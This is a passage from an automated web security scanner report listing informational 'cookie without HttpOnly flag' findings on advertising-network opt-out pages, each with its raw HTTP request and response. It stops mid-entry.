Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_optout.php?nocache=0.9899881 HTTP/1.1
Host: domdex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: optout=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.domdex.com
Set-Cookie: optout=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=domdex.com
Set-Cookie: optout=1; expires=Wed, 01-Jan-2020 05:00:00 GMT; path=/; domain=.domdex.com
Location: nai_optout_check.php
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


6.24. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?optout&nocache=0.3251545 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT; c=1

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=OPTOUT
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=O
...[SNIP]...

6.25. http://info.yahoo.com/nai/optout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.yahoo.com
Path:   /nai/optout.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout.html?token=cVRuZVptSHJ4UjM- HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; CH=AgBOpL8gAC6fIAAHciAAMXwgAB/fIAAABiAAAV0gAAIyIAAh5yAAJo8gACrM

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AO=o=1; expires=Thu, 13-Nov-2031 15:09:03 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; expires=Wed, 13-Nov-2013 18:53:43 GMT; path=/; domain=.yahoo.com
Location: http://open.ad.yieldmanager.net/V1/NWSetter?nwid1=20072115599&url=http://info.yahoo.com/nai/nai-verify.html?optoutverify=true%26opter=nai&XTS=1321210423&XSIG=0~d5fc1b609f1ce455e216ef1819125ff12eafa53b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 81

<!-- w1.help.sp2.yahoo.com uncompressed/chunked Sun Nov 13 18:53:43 UTC 2011 -->

6.26. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/OptOut.php?service=outNAI&nocache=0.662912 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxVzjEOhDAMRNG75AQeJ8bBOYxFSU2JuDuLDEm2fpqv2Qx2HkaWUttstXM3aoehWoJCXZ2pOCmcHanthqH1p3i0kudQ7so0bSU0d83LpBRahq5vmUdZ%252FvXZouDTpatgKiNUu6pMWkLr0PqV5X11XTeYRkec

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 10-Nov-2021 18:53:43 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 10-Nov-2021 18:53:43 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=exelator.com
Content-type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:43 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2


6.27. http://login.dotomi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: login.dotomi.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:55:52 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s01
Set-Cookie: Apache=50.23.123.106.1321210552525573; path=/
Last-Modified: Thu, 02 Sep 2010 18:25:52 GMT
ETag: "c0015a8d-0-48f4af1af6c00"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: image/vnd.microsoft.icon


6.28. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1230812852 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1230812852

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.ad.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.ad.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=2&participant_id=4&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.29. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=411946761 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=411946761

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserver.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserver.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserver.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserver.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.adserver.adtechus.com/nai/daa.php?action_id=2&participant_id=5&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.30. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=633460859 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=633460859

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserverec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserverec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserverec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserverec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.adserverec.adtechus.com/nai/daa.php?action_id=2&participant_id=6&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.31. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1742489720 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1742489720

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adserverwc.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adserverwc.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtechus.com;path=/
Location: http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=2&participant_id=7&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.32. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=174796341 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=174796341; oo_flag=t

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: oo_flag=DELETED; expires=Sat, 12-Nov-2011 15:07:11 GMT; path=/; domain=.nai.adsonar.com
Set-Cookie: oo_flag=DELETED; expires=Sat, 12-Nov-2011 15:07:11 GMT; path=/; domain=.adsonar.com
Set-Cookie: oo_flag=t;expires=Thu, 06-Nov-2036 13:53:51 GMT;domain=adsonar.com;path=/
Location: http://nai.adsonar.com/nai/daa.php?action_id=2&participant_id=1&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.33. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=194198501 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=194198501

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adtech.de
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtech.de
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adtech.de
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtech.de
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtech.de;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtech.de;path=/
Location: http://nai.adtech.de/nai/daa.php?action_id=2&participant_id=3&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.34. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1499749799 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1499749799; ACID=optout!

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.advertising.com
Set-Cookie: ACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.advertising.com
Set-Cookie: ACID=optout!;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=advertising.com;path=/
Location: http://nai.advertising.com/nai/daa.php?action_id=2&participant_id=0&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.35. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=293319859 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=293319859

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.glb.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.glb.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.glb.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.glb.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=adtechus.com;path=/
Location: http://nai.glb.adtechus.com/nai/daa.php?action_id=2&participant_id=8&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


6.36. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

